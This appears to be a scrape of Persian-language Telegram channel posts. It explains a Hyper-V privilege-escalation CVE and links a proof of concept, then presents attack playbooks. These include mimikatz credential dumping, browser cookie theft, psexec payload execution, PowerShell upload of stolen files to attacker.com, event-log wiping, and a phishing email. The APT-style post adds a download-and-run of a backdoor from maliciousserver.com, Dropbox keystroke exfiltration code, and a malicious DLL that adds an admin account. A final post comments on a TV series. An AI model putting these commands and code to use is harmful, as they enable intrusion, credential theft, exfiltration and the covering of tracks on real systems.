آسیبپذیری با شناسه CVE-2025-21333، یه آسیبپذیری افزایش سطح دسترسی (LPE) تو درایور vkrnlintvsp.sysه که مربوطه به Hyper-V تو ویندوز. این نقص به دلیل یه Heap Overflow ایجاد شده که به هکر لوکال احراز هویتشده اجازه میده کنترل کامل حافظه کرنل رو در اختیارش بگیره و در نهایت به سطح دسترسی SYSTEM دست پیدا کنه.
درایور vkrnlintvsp.sys که بخشی از Hyper-Vه، وظیفه پردازش درخواستهای خاصی رو از ماشینهای مجازی داره. هکر میتونه با ارسال یک درخواست IOCTL خاص به این درایور، باعث شه که کرنل حافظه بیشتری از حد مجاز تو هیپ، اختصاص بده، اما بدون بررسی مقدار واقعی دادهای که تو اون نوشته میشه. این یعنی:
سرریز تو هیپ خطرناکتر از استکه، چرا که اگه بشه جداول تخصیص حافظه رو دستکاری کرد، میشه به طور دلخواه حافظه خواند/نوشت و به کرنل حمله کرد.
مهاجم برای سواستفاده از این نقص میتونه:
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Try Hack Box
CVE-2025-21333
Windows Hyper-V Zero-Day
https://github.com/MrAle98/CVE-2025-21333-POC
@TryHackBox
Windows Hyper-V Zero-Day
https://github.com/MrAle98/CVE-2025-21333-POC
@TryHackBox
👍10🔥4❤3❤🔥2👌2⚡1🎉1🤮1🌭1
mimikatz
privilege::debug
sekurlsa::logonpasswords
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"
Get-ChildItem -Path C:\Users\ -Recurse -Filter *.docx,*.xlsx,*.pdf
neo4j console
bloodhound-python -u admin -p password -d targetcompany.com --collect all
psexec \\targetpc -u Admin -p Password -i C:\Users\Public\winos4.exe
dnscat2 --dns targetcompany.com
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.zip")
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤4🔥3❤🔥2👌2⚡1🤮1🙏1💯1🏆1
گروه Lotus Panda یکی از گروههای APT چینیه که با استفاده از نسخه آپدیت شده Sagerunex Backdoor به هدفهایی تو حوزه دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیکهای پیشرفته نفوذ، بایپس مکانیزمهای امنیتی، و افزایش سطح دسترسی تو تارگت بهره میبره.
theHarvester -d target.com -l 500 -b google
nmap -sS -sV -p- -T4 target.com
shodan search "port:443 org:TargetOrganization"
Asunto: Actualización de seguridad obligatoria
Estimado usuario,
Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.
Atentamente,
Soporte Técnico
Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"
import dropbox
ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)
def send_data(data):
dbx.files_upload(data.encode(), "/logs/data.txt")
send_data("Captured keystrokes and files")
winPEAS.bat > report.txt
کد ساخت یک DLL مخرب تو C++
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
}
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows
Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"
Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security
https://news.1rj.ru/str/safe_defense/136
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11❤7👍7❤🔥4🔥2💩2🍌2👏1💯1🏆1
پست غیر فنی
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
👍117👎19👌8🤣7💩5❤4👏3🔥1